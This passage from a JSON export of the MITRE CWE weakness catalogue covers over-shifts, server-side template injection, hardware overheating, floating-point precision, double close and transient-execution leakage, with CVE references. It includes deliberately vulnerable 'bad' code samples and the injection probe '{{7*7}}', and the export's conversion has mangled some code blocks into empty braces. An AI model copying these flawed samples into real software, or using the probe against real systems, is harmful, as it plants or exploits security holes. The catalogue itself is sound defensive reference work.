(NEED_TO_SHIFT){reg_bit -= bit_number_from_elsewhere;}return reg_bit;}unsigned int handle_io_register(unsigned int *r){int the_bit_number = choose_bit(5, 10);if ((the_bit_number &gt; 0) &amp;&amp; (the_bit_number &lt; 63)){unsigned int the_bit = 1 &lt;&lt; the_bit_number;*r |= the_bit;}return the_bit;}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","","","","","","","","","","","","","",""]}],"Body_Text":["The example above ends up with a shift amount of -5. The hexadecimal value is FFFFFFFFFFFFFFFD which, when bits above the  6th bit are masked off, the shift amount becomes a binary shift value of 111101 which is 61 decimal. A shift of 61 produces a very different result than -5. The previous example is a very simple version of the following code which is probably more realistic of what happens in a real system.","Note that the good example not only checks for negative shifts and disallows them but also for over-shifts. Not bit operation is done if the shift is out of bounds. Depending on the program, perhaps an error message should be logged."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-4307","Description":"An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4307"},{"Reference":"CVE-2012-2100","Description":"An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero - fix of CVE-2009-4307.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2100"},{"Reference":"CVE-2020-8835","Description":"An overshift in a kernel a allowed out of bounds reads and writes resulting in a root takeover.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8835"},{"Reference":"CVE-2015-1607","Description":"Program is  not properly handling signed bitwise left-shifts causing an overlapping memcpy memory range error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1607"},{"Reference":"CVE-2016-9842","Description":"Compression function improperly executes a signed left shift of a negative integer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9842"},{"Reference":"CVE-2018-18445","Description":"Some kernels improperly handle right shifts of 32 bit numbers in a 64 bit register.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18445"},{"Reference":"CVE-2013-4206","Description":"Putty  has an incorrectly sized shift value resulting in an overshift.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4206"},{"Reference":"CVE-2018-20788","Description":"LED driver overshifts under certain conditions resulting in a DoS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20788"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-03-29"}}},"1336":{"attr":{"@_ID":"1336","@_Name":"Improper Neutralization of Special Elements Used in a Template Engine","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.","Extended_Description":{"xhtml:p":["Many web applications use template engines that allow developers to insert externally-influenced values into free text or messages in order to generate a full web page, document, message, etc. Such engines include Twig, Jinja2, Pug, Java Server Pages, FreeMarker, Velocity, ColdFusion, Smarty, and many others - including PHP itself. Some CMS (Content Management Systems) also use templates.","Template engines often have their own custom command or expression language. If an attacker can influence input into a template before it is processed, then the attacker can invoke arbitrary expressions, i.e. perform injection attacks. For example, in some template languages, an attacker could inject the expression \\"{{7*7}}\\" and determine if the output returns \\"49\\" instead. The syntax varies depending on the language.","In some cases, XSS-style attacks can work, which can obscure the root cause if the developer does not closely investigate the root cause of the error.","Template engines can be used on the server or client, so both \\"sides\\" could be affected by injection. The mechanisms of attack or the affected technologies might be different, but the mistake is fundamentally the same."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Client Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Server-Side Template Injection / SSTI","Description":"This term is used for injection into template engines being used by a server."},{"Term":"Client-Side Template Injection / CSTI","Description":"This term is used for injection into template engines being used by a client."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The developer might choose a template engine that makes it easier for programmers to write vulnerable code."},{"Phase":"Implementation","Note":"The programmer might not use engine\'s built-in sandboxes or other capabilities to escape or otherwise prevent template injection from untrusted input."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a template engine that offers a sandbox or restricted mode, or at least limits the power of any available expressions, function calls, or commands."},{"Phase":"Implementation","Description":"Use the template engine\'s sandbox or restricted mode, if available."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-16783","Description":"server-side template injection in content management server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16783"},{"Reference":"CVE-2020-9437","Description":"authentication / identity management product has client-side template injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9437"},{"Reference":"CVE-2020-12790","Description":"Server-Side Template Injection using a Twig template","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12790"},{"Reference":"CVE-2021-21244","Description":"devops platform allows SSTI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21244"},{"Reference":"CVE-2020-4027","Description":"bypass of Server-Side Template Injection protection mechanism with macros in Velocity templates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4027"},{"Reference":"CVE-2020-26282","Description":"web browser proxy server allows Java EL expressions from Server-Side Template Injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26282"},{"Reference":"CVE-2020-1961","Description":"SSTI involving mail templates and JEXL expressions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1961"},{"Reference":"CVE-2019-19999","Description":"product does not use a \\"safe\\" setting for a FreeMarker configuration, allowing SSTI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19999"},{"Reference":"CVE-2018-20465","Description":"product allows read of sensitive database username/password variables using server-side template injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20465"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1193"}},{"attr":{"@_External_Reference_ID":"REF-1194"}}]},"Notes":{"Note":{"#text":"Since expression languages are often used in templating languages, there may be some overlap with CWE-917 (Expression Language Injection). XSS (CWE-79) is also co-located with template injection.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-07-19"}}},"1338":{"attr":{"@_ID":"1338","@_Name":"Improper Protections Against Hardware Overheating","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A hardware device is missing or has inadequate protection features to prevent overheating.","Extended_Description":{"xhtml:p":["Hardware, electrical circuits, and semiconductor silicon have thermal side effects, such that some of the energy consumed by the device gets dissipated as heat and increases the temperature of the device. For example, in semiconductors, higher-operating frequency of silicon results in higher power dissipation and heat. The leakage current in CMOS circuits increases with temperature, and this creates positive feedback that can result in thermal runaway and damage the device permanently.","Any device lacking protections such as thermal sensors, adequate platform cooling or thermal insulation is susceptible to attacks by malicious software that might deliberately operate the device in modes that result in overheating. This can be used as an effective denial of service (DoS) or permanent denial of service (PDoS) attack.","Depending on the type of hardware device and its expected usage, such thermal overheating can also cause safety hazards and reliability issues. Note that battery failures can also cause device overheating but the mitigations and examples included in this submission cannot reliably protect against a battery failure.","There can be similar weaknesses with lack of protection from attacks based on overvoltage or overcurrent conditions. However, thermal heat is generated by hardware operation and the device should implement protection from overheating."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware architecture, design or implementation."}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Dynamic tests should be performed to stress-test temperature controls.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Power management controls should be part of Architecture and Design reviews.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Temperature maximum and minimum limits should be enforced using thermal sensors both in silicon and at the platform level."},{"Phase":"Implementation","Description":"The platform should support cooling solutions such as fans that can be modulated based on device-operation needs to maintain a stable temperature."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Malicious software running on a core can execute instructions that consume maximum power or increase core frequency. Such a power-virus program could execute on the platform for an extended time to overheat the device, resulting in permanent damage.","Body_Text":["Execution core and platform do not support thermal sensors, performance throttling, or platform-cooling countermeasures to ensure that any software executing on the system cannot cause overheating past the maximum allowable temperature.","The platform and SoC should have failsafe thermal limits that are enforced by thermal sensors that trigger critical temperature alerts when high temperature is detected. Upon detection of high temperatures, the platform should trigger cooling or shutdown automatically."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1156"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"}}},"1339":{"attr":{"@_ID":"1339","@_Name":"Insufficient Precision or Accuracy of a Real Number","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program processes a real number with an implementation in which the number\u2019s representation does not preserve required accuracy and precision in its fractional part, causing an incorrect result.","Extended_Description":{"xhtml:p":["When a security decision or calculation requires highly precise, accurate numbers \u2013 such as financial calculations or prices \u2013 then small variations in the number could be exploited by an attacker.","There are multiple ways to store the fractional part of a real number in a computer. In all of these cases, there is a limit to the accuracy of recording a fraction. If the fraction can be represented in a fixed number of digits (binary or decimal), there might not be enough digits assigned to represent the number. In other cases the number cannot be represented in a fixed number of digits due to repeating in decimal or binary notation (e.g. 0.333333...) or due to a transcendental number such as \u03a0  or \u221a2. Rounding of numbers can lead to situations where the computer results do not adequately match the result of sufficiently accurate math."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"190","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"#text":"There are three major ways to store real numbers in computers. Each method is described along with the limitations of how they store their numbers.","xhtml:ol":{"xhtml:li":["Fixed: Some implementations use a fixed number of binary bits to represent both the integer and the fraction.  In the demonstrative example about Muller\'s Recurrence, the fraction 108.0 - ((815.0 - 1500.0 / z) / y) cannot be represented in 8 binary digits. The numeric accuracy within languages such as PL/1, COBOL and Ada is expressed in decimal digits rather than binary digits. In SQL and most databases, the length of the integer and the fraction are specified by the programmer in decimal. In the language C, fixed reals are implemented according to ISO/IEC TR18037","Floating: The number is stored in a version of scientific notation with a fixed length for the base and the significand. This allows flexibility for more accuracy when the integer portion is smaller. When dealing with large integers, the fractional accuracy is less. Languages such as PL/1, COBOL and Ada set the accuracy by decimal digit representation rather than using binary digits. Python also implements decimal floating-point numbers using the IEEE 754-2008 encoding method.","Ratio: The number is stored as the ratio of two integers. These integers also have their limits. These integers can be stored in a fixed number of bits or in a vector of digits. While the vector of digits method provides for very large integers, they cannot truly represent a repeating or transcendental number as those numbers do not ever have a fixed length."]}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness is introduced when the developer picks a method to represent a real number. The weakness may only be visible with very specific numeric inputs."}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"This weakness will generally lead to undefined results and therefore crashes. In some implementations the program will halt if the weakness causes an overflow during a calculation."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands","Note":"The results of the math are not as expected. This could cause issues where a value would not be properly calculated and provide an incorrect answer."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Read Application Data","Modify Application Data"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Patching and Maintenance"],"Description":"The developer or maintainer can move to a more accurate representation of real numbers.  In extreme cases, the programmer can move to representations such as ratios of BigInts which can represent real numbers to extremely fine precision. The programmer can also use the concept of an Unum real. The memory and CPU tradeoffs of this change must be examined. Since floating point reals are used in many programs and many locations, they are implemented in hardware and most format changes will cause the calculations to be moved into software resulting in slower programs."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Muller\'s Recurrence is a series that is supposed to converge to the number 5. When running this series with the following code, different implementations of real numbers fail at specific iterations:","Example_Code":[{"#text":"fn rec_float(y: f64, z: f64) -&gt; f64{108.0 - ((815.0 - 1500.0 / z) / y);}fn float_calc(turns: usize) -&gt; f64{let mut x: Vec&lt;f64&gt; = vec![4.0, 4.25];(2..turns + 1).for_each(|number|{x.push(rec_float(x[number - 1], x[number - 2]));});x[turns]}","attr":{"@_Nature":"bad","@_Language":"Rust"},"xhtml:br":["","","","","","","","","","","","","","",""]},{"#text":"Use num_rational::BigRational;fn rec_big(y: BigRational, z: BigRational) -&gt; BigRational{BigRational::from_integer(BigInt::from(108))- ((BigRational::from_integer(BigInt::from(815))- BigRational::from_integer(BigInt::from(1500)) / z)/ y)}fn big_calc(turns: usize) -&gt; BigRational{let mut x: Vec&lt;BigRational&gt; = vec![BigRational::from_float(4.0).unwrap(), BigRational::from_float(4.25).unwrap(),];(2..turns + 1).for_each(|number|{x.push(rec_big(x[number - 1].clone(), x[number - 2].clone()));});x[turns].clone()}","attr":{"@_Nature":"good","@_Language":"Rust"},"xhtml:br":["","","","","","","","","","","","","","","","","","","",""]}],"Body_Text":{"#text":"The chart below shows values for different data structures in the rust language when Muller\u2019s recurrence is executed to 80 iterations. The data structure f64 is a 64 bit float. The data structures I&lt;number&gt;F&lt;number&gt; are fixed representations 128 bits in length that use the first number as the size of the integer and the second size as the size of the fraction (e.g. I16F112 uses 16 bits for the integer and 112 bits for the fraction). The data structure of Ratio comes in three different implementations: i32 uses a ratio of 32 bit signed  integers,  i64 uses a ratio of 64 bit signed integers and BigInt uses a ratio of signed integer with up to 2^32 digits of base 256.  Notice how even with 112 bits of fractions or ratios of 64bit unsigned integers, this math still does not converge to an expected value of 5.","xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/Mullers-Recurrence-CWE-1339.png","@_alt":"Muller\'s Recurrence"}}}},{"Intro_Text":"On February 25, 1991, during the eve of the of an Iraqi invasion of Saudi Arabia, a Scud missile fired from Iraqi positions hit a US Army barracks in Dhahran, Saudi Arabia. It miscalculated time and killed 28 people [REF-1190].","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1190"}}}},{"Intro_Text":"Sleipner A, an offshore drilling platform in the North Sea was incorrectly constructed with an underestimate of 50% of strength in a critical cluster of buoyancy cells needed for construction. This led to a leak in buoyancy cells during lowering, causing a seismic event of 3.0 on the Richter Scale and about $700M loss [REF-1190].","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1190"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-16069","Description":"Chain: series of floating-point precision errors\\n\\t\\t\\t(CWE-1339) in a web browser rendering engine causes out-of-bounds read\\n\\t\\t\\t(CWE-125), giving access to cross-origin data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16069"},{"Reference":"CVE-2017-7619","Description":"Chain: rounding error in floating-point calculations\\n\\t\\t\\t(CWE-1339) in image processor leads to infinite loop (CWE-835)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7619"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t\\t\\tbuffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t\\t\\tcalculated by using ceiling() and floor() on floating point values\\n\\t\\t\\t(CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t\\t\\trandom-number generator causes some zero bits to be reliably\\n\\t\\t\\tgenerated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t\\t\\tlooping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t\\t\\tthe loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1186"}},{"attr":{"@_External_Reference_ID":"REF-1187"}},{"attr":{"@_External_Reference_ID":"REF-1188"}},{"attr":{"@_External_Reference_ID":"REF-1189"}},{"attr":{"@_External_Reference_ID":"REF-1190"}},{"attr":{"@_External_Reference_ID":"REF-1191"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-07-08"}}},"1341":{"attr":{"@_ID":"1341","@_Name":"Multiple Releases of Same Resource or Handle","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product attempts to close or release a resource or handle more than once, without an intervening successful open.","Extended_Description":{"xhtml:p":["Code typically requires \\"opening\\" handles or references to resources such as memory, files, devices, connections, services, etc. When the code is finished with using the resource, it is typically expected to \\"close\\" or \\"release\\" the resource, which indicates to the environment (such as the OS) that the resource can be re-assigned or reused by unrelated processes or actors. APIs or other abstractions are often used to perform this release, such as free() or delete() within C/C++, or file-handle close() operations that are used in many languages.","Unfortunately, the implementation or design of such APIs might expect the developer to be responsible for ensuring that such APIs are only called once per release of the resource. if the developer attempts to release the same resource/handle more than onc, then the API\'s expectations are not met, resulting in undefined and/or insecure behavior. This could lead to consequences such as memory corruption, data corruption, execution path corruption, or other consequences.","Note that while the implementation for most (if not all) resource reservation allocations involve a unique identifier/pointer/symbolic reference, then if this identifier is reused, checking the identifier for resource closure may result in a false state of openness and closing of the wrong resource. For this reason, reuse of identifiers is discouraged."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Rust","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":"DoS: Crash, Exit, or Restart","Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"For commonly-used APIs and resource types, automated tools often have signatures that can spot this issue."},{"Method":"Automated Dynamic Analysis","Description":"Some compiler instrumentation tools such as AddressSanitizer (ASan) can indirectly detect some instances of this weakness."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When closing a resource, set the associated variable to NULL or equivalent value for the given language. Some APIs will ignore this null value or lead to application crashes or exceptions, which may be preferable to data/memory corruption."},{"Phase":"Implementation","Description":"Implementing a flag that is set when the resource is opened and cleared when it is closed and checked before closing can be effective at prevention."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example attempts to close the file twice. In some cases, the C library fclose() function will catch the error and return an error code. In other implementations, a double-free (CWE-415) occurs causing the program to fault. Note that the examples presented here are simplistic, and double fclose() calls will frequently be spread around a program, making them more difficult to find during code reviews.","Example_Code":[{"#text":"char b[2000];FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);int r1 = fclose(f);printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);int r2 = fclose(f);\\t// Double closeprintf(\\"2 close done \'%d\'\\\\n\\", r2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""]}},{"#text":"char b[2000];FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","",""],"xhtml:div":{"#text":"b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);int r1 = fclose(f);printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}},{"#text":"char b[2000];int f_flg = 0;FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"f_flg = 1;b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);if (f_flg){}if (f_flg){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""],"xhtml:div":[{"#text":"int r1 = fclose(f);f_flg = 0;printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"int r2 = fclose(f);\\t// Double closef_flg = 0;printf(\\"2 close done \'%d\'\\\\n\\", r2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}],"Body_Text":[{"#text":"This example only has one call to fclose(). While this is certainly the preferred handling of this problem, this simplistic method is not always possible.","xhtml:br":""},{"#text":"This example uses a flag to call fclose() only once. Note that this flag is explicit. The variable \\"f\\" could also have been used as it will be either NULL if the file is not able to be opened or a valid pointer if the file was successfully opened. If \\"f\\" is replacing \\"f_flg\\" then \\"f\\" would need to be set to NULL after the first fclose() call so the second fclose call would never be executed.","xhtml:br":""}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-13351","Description":"file descriptor double close can cause the wrong file to be associated with a file descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13351"},{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2004-0772","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0772"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1198"}},{"attr":{"@_External_Reference_ID":"REF-1199"}},{"attr":{"@_External_Reference_ID":"REF-1200"}},{"attr":{"@_External_Reference_ID":"REF-1201"}}]},"Notes":{"Note":{"#text":"The terms related to \\"release\\"  may vary depending on the type of resource, programming language, specification, or framework. \\"Close\\" has been used synonymously for the release of resources like file descriptors and file handles. \\"Return\\" is sometimes used instead of Release. \\"Free\\" is typically used when releasing memory or buffers back into the system for reuse.","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-09-07"}}},"1342":{"attr":{"@_ID":"1342","@_Name":"Information Exposure through Microarchitectural State after Transient Execution","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The processor does not properly clear microarchitectural state after incorrect microcode assists or speculative execution, resulting in transient execution.","Extended_Description":{"xhtml:p":["In many processor architectures an exception, mis-speculation, or microcode assist results in a flush operation to clear results that are no longer required. This action prevents these results from influencing architectural state that is intended to be visible from software. However, traces of this transient execution may remain in microarchitectural buffers, resulting in a change in microarchitectural state that can expose sensitive information to an attacker using side-channel analysis. For example, Load Value Injection (LVI) [REF-1202] can exploit direct injection of erroneous values into intermediate load and store buffers.","Several conditions may need to be fulfilled for a successful attack:"],"xhtml:ul":{"xhtml:li":["1) incorrect transient execution that results in remanence of sensitive information;","2) attacker has the ability to provoke microarchitectural exceptions;","3) operations and structures in victim code that can be exploited must be identified."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":[{"attr":{"@_Class":"Workstation","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"x86","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ARM","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}}],"Technology":[{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Requirements"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands"],"Likelihood":"Medium"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Requirements"],"Description":"Hardware ensures that no illegal data flows from faulting micro-ops exists at the microarchitectural level.","Effectiveness":"High","Effectiveness_Notes":"Being implemented in silicon it is expected to fully address the known weaknesses with limited performance impact."},{"Phase":"Build and Compilation","Description":"Include instructions that explicitly remove traces of unneeded computations from software interactions with microarchitectural elements e.g. lfence, sfence, mfence, clflush.","Effectiveness":"High","Effectiveness_Notes":"This effectively forces the processor to complete each memory access before moving on to the next operation. This may have a large performance impact."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Faulting loads in a victim domain may trigger incorrect transient forwarding, which leaves secret-dependent traces in the microarchitectural state. Consider this example from [REF-1203].","Body_Text":["Consider the code gadget:",{"xhtml:p":["A processor with this weakness will store the value of untrusted_arg (which may be provided by an attacker) to the stack, which is trusted memory. Additionally, this store operation will save this value in some microarchitectural buffer, e.g. the store queue.","In this code gadget, \\n\\t\\t\\t\\t\\ttrusted_ptr is dereferenced while the attacker forces a page fault. The faulting load causes the processor to mis-speculate by forwarding untrusted_arg as the (speculative) load result. The processor then uses untrusted_arg for the pointer dereference. After the fault has been handled and the load has been re-issued with the correct argument, secret-dependent information stored at the address of trusted_ptr remains in microarchitectural state and can be extracted by an attacker using a code gadget."]}],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"void call_victim(size_t untrusted_arg) {}","xhtml:br":"","xhtml:div":{"#text":"*arg_copy = untrusted_arg;array[**trusted_ptr * 4096];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-0551","Description":"Load value injection in some processors utilizing speculative execution may allow an authenticated user to enable information disclosure via a side-channel with local 